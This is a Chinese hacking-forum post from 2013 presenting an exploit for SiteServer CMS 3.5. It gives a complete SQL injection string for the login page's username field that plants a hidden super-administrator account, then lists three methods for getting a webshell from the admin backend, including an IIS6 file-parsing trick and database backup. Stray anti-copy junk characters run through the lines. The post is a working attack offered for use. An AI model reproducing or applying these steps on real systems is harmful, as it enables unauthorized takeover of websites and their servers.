找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2743|回复: 0
打印 上一主题 下一主题

SiteServer CMS UserCenter/login.aspx页面用户名处sql注射

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:40:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版8 ]5 C& n( n7 b# _; @6 W
stieserver官网:www.siteserver.cn+ e5 D( G- C- j0 V5 s1 Q2 w: e
EXP:3 g$ j& @, K9 I% x0 ^; J+ r
直接访问UserCenter/login.aspx+ F! v# h6 i7 u1 X
用户名处输入:4 p4 U/ A3 `1 T; l

2 n3 c. {4 N$ R1 v2 }1 P123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
8 a/ a  S' X$ ~, [密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。! |7 F# ^' h  ]) ]
之后再访问后台SiteServer/login.aspx用插入的用户登陆% w3 b# ~4 j3 i$ _
后台拿webshell的三种方法:1 ~" P1 v9 t. ~4 l6 f. j) i
一、. E  \4 r% ~9 q4 n9 m
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
# t/ U' {* r3 H/ s3 y% g  {* a二、
4 Q1 e& O+ q0 ?( ?; a# v成员权限-》添加用户-》用户名为:1.asp
7 @7 _. P8 F" Bhttp://127.0.0.1/usercenter/
3 q8 E7 L4 C$ u7 n5 U& r用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
' F, C* ]& w1 R8 f" q' N2 H5 b, M! U(ps:后台添加用户时不会验证是否含有非法字符)
0 p. E4 e7 I  s2 T2 u三、
. A& Y4 W; U' J7 e/ L% L' B系统工具-》实用工具-》机器参数查看! g$ R2 R5 V$ |) ?
可以看到数据库类型、名称,WEB路径' e7 b1 u) g2 j- @) e# R; r$ C
系统工具-》数据库工具-》SQL语句查询
& C3 l3 b: }/ I$ q. n3 ^这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表